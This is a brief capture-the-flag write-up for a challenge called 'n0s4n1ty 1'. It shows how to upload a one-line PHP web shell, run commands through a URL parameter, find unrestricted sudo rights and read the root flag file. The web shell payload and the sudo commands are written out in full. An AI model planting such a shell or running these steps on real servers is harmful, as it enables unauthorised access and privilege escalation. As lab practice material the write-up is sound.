n0s4n1ty 1

CHALLENGE DESCRIPTION

SOLUTION

Upload our payload

<?php system($_GET["cmd"]); ?>

We can see that our file is located at /uploads/[file]

Now we inject to the URL /uploads/[file].php?cmd=sudo -l

We can see its respond NOPASSWD: ALL

Now it will be easy for us, do this sudo cat /root/flag.txt